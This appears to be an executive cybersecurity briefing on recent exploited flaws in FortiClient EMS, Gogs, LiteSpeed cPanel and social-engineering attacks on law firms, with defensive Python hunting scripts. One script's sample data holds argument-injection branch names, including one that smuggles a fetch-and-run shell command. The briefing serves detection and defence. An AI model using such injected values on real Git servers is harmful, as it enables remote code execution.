In the last ~48 hours, key cybersecurity developments require executive attention: FortiClient EMS exploitation delivering credential-stealing malware, a Gogs zero-day exposing self-hosted Git servers to remote code execution, an actively exploited LiteSpeed cPanel plugin flaw giving attackers root-level execution, and an FBI warning that Silent Ransom Group is targeting law firms with fake IT support calls and even in-person visits.

These developments reinforce priority themes for the weekend: management platforms are becoming malware delivery systems, developer infrastructure is a direct path to secrets and source code, hosting control planes remain high-value targets, and social engineering is moving beyond inboxes into phone calls, remote tools, and physical access attempts.

📊 Executive Threat Heatmap 📊

Top-level takeaways this week:

  • Endpoint / Management Platforms ↑ — FortiClient EMS abuse shows attackers turning trusted endpoint administration into malware delivery.

  • Developer Infrastructure ↑ — Gogs RCE risk puts private repos, tokens, SSH keys, and source code directly in scope.

  • Hosting / Web Control Planes ↑ — LiteSpeed cPanel exploitation gives attackers root-level script execution on shared hosting environments.

  • Social Engineering / Data Extortion ↑ — Silent Ransom Group is blending phishing, fake IT support, remote access tools, cloud exfiltration, and physical office visits.

🚨 Late-Breaking Threats (last 7-10 days) 🚨

1) FortiClient EMS flaw exploited to push infostealer malware – High

What changed: Attackers are exploiting a critical FortiClient EMS vulnerability tracked as CVE-2026-35616 to deploy EKZ Infostealer through FortiClient-managed VPN scripting workflows. The activity abuses a trusted management path to push malicious PowerShell commands to managed endpoints.

Why this matters: FortiClient EMS is a management platform. If attackers can push scripts through it, they are not just compromising one endpoint. They are borrowing your own administration system to steal browser credentials, cookies, and user data at scale.

2) Gogs zero-day exposes self-hosted Git servers to RCE – High

What changed: A critical Gogs zero-day allows authenticated attackers to gain remote code execution through argument injection during pull-request rebase operations. Rapid7 warned that default configurations with open registration increase exposure, and exploitation can expose private repos, password hashes, API tokens, SSH keys, and 2FA secrets.

Why this matters: Self-hosted Git is not “just developer tooling.” It is source code, credentials, deployment logic, and operational memory. If attackers own it, they may inherit the instructions and keys needed to compromise everything downstream.

3) CISA: Four days to patch exploited LiteSpeed cPanel flaw – Medium-High

What changed: CISA ordered federal agencies to patch an actively exploited LiteSpeed cPanel plugin vulnerability tracked as CVE-2026-48172 by May 29. The flaw allows remote attackers with no privileges to execute arbitrary scripts with root privileges through incorrect privilege assignment.

Why this matters: Hosting control planes are blast-radius machines. A root-level issue in a cPanel plugin can turn one exposed server into customer data exposure, webshell deployment, credential theft, and a long weekend of “how many sites were on that box again?”

4) Silent Ransom Group targeting law firms with fake IT support – Medium-High

What changed: The FBI warned that Silent Ransom Group is targeting U.S. law firms with phishing, fake IT support calls, remote access tooling, and even in-person visits to steal sensitive data. The group relies on legitimate remote management tools and trusted cloud platforms like Google Drive and OneDrive to blend into normal operations.

Why this matters: This is social engineering with a field office. If attackers can convince staff to grant remote access, or physically show up and copy data to a USB drive, your “email security awareness training” is not enough. Charming. Also terrible.

🛠️ Pattern & TTP Summary 🛠️
(trusted platform abuse → extortion)

| Stage | Vector | What We're Seeing |
|---|---|---|
| Initial Access | Management platform exploitation | FortiClient EMS abuse used to push malicious scripts through trusted endpoint workflows |
| Privilege / Persistence | Git server RCE | Gogs argument injection enabling command execution and repository compromise |
| Control Plane Abuse | Hosting / cPanel exploitation | LiteSpeed plugin flaw enabling arbitrary script execution as root |
| Exfiltration / Extortion | Social engineering + remote access tools | Silent Ransom Group using fake IT support calls, in-person visits, and Google Drive / OneDrive uploads to steal data and extort victims |

✅ Fail-Safe Checklist (before COB) ✅

🔄 Patch & Hardening

  • Patch FortiClient EMS and confirm CVE-2026-35616 remediation across all exposed management servers.

  • Review FortiClient EMS configuration for unexpected Remote Access Profile changes, certificate-authentication anomalies, and new administrative actions.

  • Restrict or disable open registration on Gogs and validate whether rebase-before-merge workflows are enabled.

  • Patch LiteSpeed WHM/cPanel plugin stacks and run vendor-recommended log checks for exploitation indicators.

  • Restrict remote access tools to approved admins, approved devices, and approved business workflows only.

🧑‍💻 People & Monitoring

  • Monitor FortiClient EMS activity for script execution, VPN policy changes, unfamiliar admin origins, and credential-stealer indicators.

  • Hunt Gogs activity for suspicious pull requests, malicious branch names, unexpected rebase operations, and repo access anomalies.

  • Watch cPanel/hosting logs for redisAble activity, unexpected root-level script execution, and new web-accessible files.

  • Train help desk and legal staff to challenge urgent IT-support calls, remote-access requests, and anyone physically requesting device access.

  • Monitor cloud exfil paths like Google Drive, OneDrive, Dropbox, and unmanaged file-transfer tools.

📋 Process

  • Enforce a change freeze on endpoint management, Git hosting, cPanel/hosting platforms, and remote access tooling; only CISO-approved changes, including the emergency patches above, go through.

  • Conduct 30-minute tabletop:
    “Fake IT support call → remote access tool installed → data exfiltration to cloud storage → extortion demand.”

🤝 Partners

  • Require MSP attestation for FortiClient EMS and LiteSpeed/cPanel patch status.

  • Require DevOps validation of Gogs exposure, registration settings, repo permissions, and secret rotation readiness.

  • Require legal/business unit confirmation that staff know how to validate IT support requests before granting remote or physical access.

  • Validate MSSP coverage for endpoint management abuse, Git server compromise, hosting control-plane abuse, and remote-tool exfiltration.

🕵️ Detection Opportunities 🕵️

FortiClient EMS: Monitor for unexpected Remote Access Profile changes, suspicious VPN scripting activity, PowerShell execution from FortiClient-managed workflows, and browser credential access after policy pushes.

Gogs: Alert on new user registrations, suspicious pull requests, unusual branch names, rebase-before-merge activity, repo-wide access spikes, and unexpected outbound traffic from Git servers.
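One concrete way to act on the "unusual branch names" item above, as an added example for this briefing rather than code from the Gogs project or from Rapid7: export the ref names from each repository (for example with `git for-each-ref --format='%(refname)'`) and triage them for names that a command-line git invocation could misread as an option or that a shell would misparse. The checks are heuristics and the length threshold is an assumption; a hit warrants a human look, not a verdict.

```python
"""Triage Git ref names for argument-injection and shell-metacharacter risk.

Added example for this briefing; not code from the Gogs project or Rapid7.
Assumption: ref names come from 'git for-each-ref --format="%(refname)"'
run against each repository and are fed in as plain strings. The checks
are triage heuristics, not proof that the rebase bug was exploited.
"""
import re
from dataclasses import dataclass

# Characters that matter if a ref name is ever interpolated into a shell
# command line, plus control characters that have no place in a branch name.
_SHELL_META = re.compile(r"""[;&|`$<>(){}\\"'\s\x00-\x1f]""")

_REF_PREFIXES = ("refs/heads/", "refs/remotes/", "refs/tags/", "refs/pull/")

# Length threshold is an assumption; tune it to your repositories.
_MAX_SANE_LEN = 120


@dataclass(frozen=True)
class Finding:
    ref: str
    reason: str


def branch_name(ref: str) -> str:
    """Strip the refs/... namespace so checks run on the user-chosen part."""
    for prefix in _REF_PREFIXES:
        if ref.startswith(prefix):
            return ref[len(prefix):]
    return ref


def check_ref(ref: str) -> list[Finding]:
    """Return zero or more findings for one ref name."""
    name = branch_name(ref)
    findings: list[Finding] = []

    # git subcommands treat a leading '-' as an option, so a branch named
    # like an option can change what 'git rebase <branch>' does. Every
    # '/'-separated component is checked, since tooling may split on '/'.
    if any(part.startswith("-") for part in name.split("/") if part):
        findings.append(Finding(ref, "option-like component (begins with '-')"))

    if _SHELL_META.search(name):
        findings.append(Finding(ref, "shell metacharacter or control character"))

    if len(name) > _MAX_SANE_LEN:
        findings.append(Finding(ref, f"unusually long name ({len(name)} chars)"))

    return findings


def hunt_refs(refs: list[str]) -> list[Finding]:
    """Run check_ref over every exported ref name and return all findings."""
    out: list[Finding] = []
    for ref in refs:
        out.extend(check_ref(ref.strip()))
    return out


if __name__ == "__main__":
    # Constructed sample refs for a dry run; not taken from any real repository.
    sample = [
        "refs/heads/main",
        "refs/heads/feature/login-fix",
        "refs/heads/--exec=id",
        "refs/heads/release/-x",
        "refs/heads/fix;curl${IFS}x|sh",
    ]
    for f in hunt_refs(sample):
        print(f"{f.ref!r}: {f.reason}")
```

Run it per repository from a cron job or as a pre-receive hook input filter; a name like `feature/login-fix` passes because the dash is inside a component, while `release/-x` is flagged because one component is option-shaped.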

LiteSpeed / cPanel: Hunt for redisAble indicators, unexpected root-level script execution, newly created web-accessible files, unfamiliar source IPs, and sudden cPanel privilege changes.
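A starting point for the "newly created web-accessible files" and "root-level script execution" hunts above, as an added example for this briefing and not code from LiteSpeed, cPanel or CISA. It assumes the cPanel default layout of /home/<user>/public_html, treats the executable-extension list and the 48-hour window as tuning choices, and expects to run as root so every account is readable. A file inside a user's web root owned by someone other than that user (root included) is reported, because a root-level exploit writing a webshell leaves exactly that trace. The sample web root it builds is constructed for a dry run, not real customer data.

```python
"""Hunt cPanel-style web roots for freshly written or out-of-place files.

Added example for this briefing; not LiteSpeed, cPanel or CISA code.
Assumptions: document roots live at /home/<user>/public_html, the
extension list and 48-hour window are tuning choices, and the scan runs
as root so every account's files are readable.
"""
import os
import stat
import tempfile
import time
from dataclasses import dataclass
from typing import Optional

WEB_EXEC_EXT = {".php", ".phtml", ".php5", ".php7", ".phar", ".cgi", ".pl", ".sh"}


@dataclass(frozen=True)
class Hit:
    path: str
    reasons: tuple[str, ...]


def inspect_file(path: str, now: float, window_s: float, owner_uid: int) -> tuple[str, ...]:
    """Return the reasons one file is interesting, or an empty tuple."""
    try:
        st = os.lstat(path)
    except OSError:
        return ()
    if not stat.S_ISREG(st.st_mode):
        return ()
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext in WEB_EXEC_EXT and (now - st.st_mtime) < window_s:
        reasons.append("server-executable file written inside the window")
    # A root-level exploit dropping files leaves them owned by root (or by
    # whatever the plugin runs as), not by the account that owns the web root.
    if st.st_uid != owner_uid:
        who = "root" if st.st_uid == 0 else f"uid {st.st_uid}"
        reasons.append(f"owned by {who}, but web root belongs to uid {owner_uid}")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return tuple(reasons)


def hunt_webroot(root: str, window_hours: float = 48.0, now: Optional[float] = None) -> list[Hit]:
    """Walk one document root and collect files worth a human look."""
    now = time.time() if now is None else now
    try:
        owner_uid = os.stat(root).st_uid
    except OSError:
        return []
    hits: list[Hit] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = inspect_file(path, now, window_hours * 3600, owner_uid)
            if reasons:
                hits.append(Hit(path, reasons))
    return sorted(hits, key=lambda h: h.path)


def hunt_all_accounts(home: str = "/home") -> list[Hit]:
    """Apply hunt_webroot to every cPanel account under the home directory."""
    hits: list[Hit] = []
    if not os.path.isdir(home):
        return hits
    for user in sorted(os.listdir(home)):
        root = os.path.join(home, user, "public_html")
        if os.path.isdir(root):
            hits.extend(hunt_webroot(root))
    return hits


def make_sample_webroot() -> str:
    """Build a constructed web root for a dry run: an old legitimate index.php,
    a fresh stylesheet, a fresh PHP drop, and a world-writable data file."""
    root = tempfile.mkdtemp(prefix="public_html_")
    old = time.time() - 10 * 86400
    for rel, body, mtime, mode in [
        ("index.php", "<?php echo 'site'; ?>", old, 0o644),
        ("css/style.css", "body{}", None, 0o644),
        ("wp-content/uploads/x.php", "<?php /* fresh drop */ ?>", None, 0o644),
        ("tmp/data.txt", "x", old, 0o666),
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
        if mtime is not None:
            os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    for hit in hunt_webroot(make_sample_webroot()):
        print(hit.path, "->", "; ".join(hit.reasons))
```

On a real host call `hunt_all_accounts()` and diff the output against the previous run; the stylesheet and the old index.php stay quiet, while the fresh PHP file under wp-content/uploads and the world-writable file are the two that come back.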

Silent Ransom Group-style activity: Watch for remote access tool installs after help desk calls, unusual cloud uploads to Google Drive / OneDrive / Dropbox, suspicious USB activity, and reports of in-person IT support requests.

📈 Risk Outlook 📈

Overall Risk Level: High

This weekend’s highest-risk pattern is trusted-platform abuse:

  • Endpoint management platforms

  • Self-hosted Git systems

  • Hosting control panels

  • Remote access and cloud exfiltration workflows

Attackers are not just looking for vulnerable endpoints. They are targeting the systems your teams use to manage endpoints, host code, administer websites, and move data. In other words, the exact systems everyone assumes are “supposed to be doing that.”

📌 Key Leadership Takeaways 📌

Endpoint management platforms are Tier-0-adjacent systems.

Self-hosted Git servers are credential and source-code vaults, not side projects.

Hosting control planes can become root-level compromise engines.

Social engineering is no longer just email. It includes calls, remote tools, cloud storage, and physical presence.

📋 Immediate Leadership Checklist 📋

🔄 Verify: FortiClient EMS, Gogs exposure controls, and LiteSpeed/cPanel remediation status.

📊 Validate: Monitoring coverage for management-platform abuse, Git server RCE, root-level script execution, and remote-access tooling.

💼 Confirm: Help desk and legal teams know how to validate IT-support requests before granting access.

🔹 Rehearse: “Trusted admin platform compromise → credential theft → cloud exfiltration → extortion response.”

Final Insight: Attackers are not just sneaking through the side door anymore.

They are showing up as your management console, your Git server, your hosting control panel, and occasionally “Dave from IT” with a clipboard.

Verify trust before it becomes evidence.
